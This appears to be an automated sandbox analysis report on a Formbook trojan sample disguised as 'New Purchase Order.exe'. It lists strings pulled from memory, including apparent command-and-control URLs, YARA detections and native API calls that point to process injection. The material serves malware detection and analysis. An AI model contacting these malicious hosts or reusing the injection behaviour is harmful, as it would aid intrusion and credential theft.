            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 09 Sep 2024 02:54:23 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: setupugc.exe, 00000011.00000002.4112456393.00000000042D4000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003134000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2196442101.0000000039054000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000573E000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000459E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://fedoraproject.org/
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000573E000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000459E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
            Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ibDqDkseW.exe, 00000009.00000002.1833355900.0000000003303000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4113419509.00000000051D8000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.jyourwd.store
            Source: kdFPsEWDpy.exe, 00000014.00000002.4113419509.00000000051D8000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.jyourwd.store/6ua2/
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp, New Purchase Order.exe, 00000000.00000002.1700031983.0000000005354000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000390E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000541A000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000427A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fe3e9h.com:9009/register
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000541A000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000427A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?a06b4d1659d3d0d2e58179ddfe478d25
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oa
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033n
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000011.00000003.2085690031.0000000008154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004F64000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domainnameshop.com/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domainnameshop.com/whois
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004F64000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domeneshop.no/whois
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000491C000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000377C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJS

            E-Banking Fraud

            Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: New Purchase Order.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0042C593 NtClose,8_2_0042C593
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172B60 NtClose,LdrInitializeThunk,8_2_01172B60
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01172DF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01172C70
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011735C0 NtCreateMutant,LdrInitializeThunk,8_2_011735C0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01174340 NtSetContextThread,8_2_01174340
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01174650 NtSuspendThread,8_2_01174650
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172B80 NtQueryInformationFile,8_2_01172B80
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172BA0 NtEnumerateValueKey,8_2_01172BA0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172BF0 NtAllocateVirtualMemory,8_2_01172BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172BE0 NtQueryValueKey,8_2_01172BE0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172AB0 NtWaitForSingleObject,8_2_01172AB0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172AD0 NtReadFile,8_2_01172AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172AF0 NtWriteFile,8_2_01172AF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172D10 NtMapViewOfSection,8_2_01172D10
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172D00 NtSetInformationFile,8_2_01172D00
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172D30 NtUnmapViewOfSection,8_2_01172D30
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172DB0 NtEnumerateKey,8_2_01172DB0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172DD0 NtDelayExecution,8_2_01172DD0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172C00 NtQueryInformationProcess,8_2_01172C00
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172C60 NtCreateKey,8_2_01172C60
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172CA0 NtQueryInformationToken,8_2_01172CA0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172CC0 NtQueryVirtualMemory,8_2_01172CC0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172CF0 NtOpenProcess,8_2_01172CF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172F30 NtCreateSection,8_2_01172F30
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172F60 NtCreateProcessEx,8_2_01172F60
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172F90 NtProtectVirtualMemory,8_2_01172F90
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172FB0 NtResumeThread,8_2_01172FB0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172FA0 NtQuerySection,8_2_01172FA0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172FE0 NtCreateFile,8_2_01172FE0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01172E30 NtWriteVirtualMemory,8_2_01172E30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172E80 NtReadVirtualMemory,8_2_01172E80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172EA0 NtAdjustPrivilegesToken,8_2_01172EA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172EE0 NtQueueApcThread,8_2_01172EE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173010 NtOpenDirectoryObject,8_2_01173010
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173090 NtSetValueKey,8_2_01173090
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011739B0 NtGetContextThread,8_2_011739B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173D10 NtOpenProcessToken,8_2_01173D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173D70 NtOpenThread,8_2_01173D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03934340 NtSetContextThread,LdrInitializeThunk,17_2_03934340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03934650 NtSuspendThread,LdrInitializeThunk,17_2_03934650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_03932BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03932BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,17_2_03932BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932B60 NtClose,LdrInitializeThunk,17_2_03932B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AD0 NtReadFile,LdrInitializeThunk,17_2_03932AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AF0 NtWriteFile,LdrInitializeThunk,17_2_03932AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FB0 NtResumeThread,LdrInitializeThunk,17_2_03932FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FE0 NtCreateFile,LdrInitializeThunk,17_2_03932FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F30 NtCreateSection,LdrInitializeThunk,17_2_03932F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_03932E80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,17_2_03932EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DD0 NtDelayExecution,LdrInitializeThunk,17_2_03932DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_03932DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,17_2_03932D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_03932D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_03932CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_03932C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C60 NtCreateKey,LdrInitializeThunk,17_2_03932C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039335C0 NtCreateMutant,LdrInitializeThunk,17_2_039335C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039339B0 NtGetContextThread,LdrInitializeThunk,17_2_039339B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932B80 NtQueryInformationFile,17_2_03932B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AB0 NtWaitForSingleObject,17_2_03932AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F90 NtProtectVirtualMemory,17_2_03932F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FA0 NtQuerySection,17_2_03932FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F60 NtCreateProcessEx,17_2_03932F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932EA0 NtAdjustPrivilegesToken,17_2_03932EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932E30 NtWriteVirtualMemory,17_2_03932E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932DB0 NtEnumerateKey,17_2_03932DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932D00 NtSetInformationFile,17_2_03932D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CC0 NtQueryVirtualMemory,17_2_03932CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932CF0 NtOpenProcess,17_2_03932CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932C00 NtQueryInformationProcess,17_2_03932C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933090 NtSetValueKey,17_2_03933090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933010 NtOpenDirectoryObject,17_2_03933010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933D10 NtOpenProcessToken,17_2_03933D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03933D70 NtOpenThread,17_2_03933D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E78FD0 NtCreateFile,17_2_02E78FD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E792D0 NtClose,17_2_02E792D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79230 NtDeleteFile,17_2_02E79230
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79140 NtReadFile,17_2_02E79140
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E79430 NtAllocateVirtualMemory,17_2_02E79430
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00C8D5BC0_2_00C8D5BC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A2B7300_2_02A2B730
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A277070_2_02A27707
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02A277180_2_02A27718
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4D4940_2_06F4D494
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4B4700_2_06F4B470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F476300_2_06F47630
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F4761F0_2_06F4761F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F455500_2_06F45550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F451180_2_06F45118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F451080_2_06F45108
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F46D580_2_06F46D58
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F47B400_2_06F47B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_06F47B300_2_06F47B30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004019D38_2_004019D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004185938_2_00418593
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004030508_2_00403050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004100638_2_00410063
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040E0E38_2_0040E0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042EB938_2_0042EB93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004184D88_2_004184D8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004024B08_2_004024B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FE438_2_0040FE43
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FE3B8_2_0040FE3B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0041677E8_2_0041677E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004167838_2_00416783
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DA1188_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011301008_2_01130100
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C81588_2_011C8158
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012001AA8_2_012001AA
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F41A28_2_011F41A2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F81CC8_2_011F81CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D20008_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA3528_2_011FA352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012003E68_2_012003E6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F08_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E02748_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C02C08_2_011C02C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011405358_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012005918_2_01200591
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E44208_2_011E4420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F24468_2_011F2446
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EE4F68_2_011EE4F6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011647508_2_01164750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011407708_2_01140770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113C7C08_2_0113C7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115C6E08_2_0115C6E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011569628_2_01156962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120A9A68_2_0120A9A6
